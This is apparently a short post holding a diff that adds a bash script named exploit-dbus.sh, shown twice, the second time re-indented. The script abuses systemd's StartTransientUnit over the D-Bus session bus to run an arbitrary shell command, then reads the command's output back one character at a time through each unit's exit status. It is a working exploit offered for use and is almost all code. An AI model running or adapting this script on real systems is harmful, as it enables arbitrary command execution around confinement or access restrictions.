virgilhem · January 22, 2024 05:22
diff --git a/exploit-dbus.sh b/exploit-dbus.sh
 #!/bin/bash
 cmd="${1:-/bin/id -u}"
 cmd="${cmd} &> /tmp/output"
 caller() {
  job_name="transient$(date +%s%N).service"
  job_path=$(echo $job_name | sed 's/\./_2e/')
  gdbus call --session \
    --dest=org.freedesktop.systemd1 \
    --object-path=/org/freedesktop/systemd1 \
    --method=org.freedesktop.systemd1.Manager.StartTransientUnit \
    "${job_name}" "fail" "[('ExecStart', <[('/bin/sh', ['/bin/sh','-c', '${cmd}'], false)]>)]" "[]" \
  &>0
  sleep 0.05
  status=$(\
  gdbus call --session \
    --dest=org.freedesktop.systemd1 \
    --object-path=/org/freedesktop/systemd1/unit/"${job_path}" \
    --method=org.freedesktop.DBus.Properties.Get \
    "org.freedesktop.systemd1.Service" "ExecMainStatus")
  return ${status:2:1}
 }
 caller
 [ "${@: -1}" != "-o" ] && exit 0
 for n in $(seq 1 100); do
  for x in {0..9} {a..z}; do
    cmd="c=\$(head -c"$n" /tmp/output | tail -c1) && [[ "\$c" =~ ^[a-z0-9] ]] && [[ "\$c" = "$x" ]] || false"
    caller && echo -n "${x}" && break
  done
 done
	#!/bin/bash
	cmd="${1:-/bin/id -u}"
	cmd="${cmd} &> /tmp/output"
	caller() {
	job_name="transient$(date +%s%N).service"
	job_path=$(echo $job_name \| sed 's/\./_2e/')
	gdbus call --session \
	--dest=org.freedesktop.systemd1 \
	--object-path=/org/freedesktop/systemd1 \
	--method=org.freedesktop.systemd1.Manager.StartTransientUnit \
	"${job_name}" "fail" "[('ExecStart', <[('/bin/sh', ['/bin/sh','-c', '${cmd}'], false)]>)]" "[]" \
	&>0
	sleep 0.05
	status=$(\
	gdbus call --session \
	--dest=org.freedesktop.systemd1 \
	--object-path=/org/freedesktop/systemd1/unit/"${job_path}" \
	--method=org.freedesktop.DBus.Properties.Get \
	"org.freedesktop.systemd1.Service" "ExecMainStatus")
	return ${status:2:1}
	}
	caller
	[ "${@: -1}" != "-o" ] && exit 0
	for n in $(seq 1 100); do
	for x in {0..9} {a..z}; do
	cmd="c=\$(head -c"$n" /tmp/output \| tail -c1) && [[ "\$c" =~ ^[a-z0-9] ]] && [[ "\$c" = "$x" ]] \|\| false"
	caller && echo -n "${x}" && break
	done
	done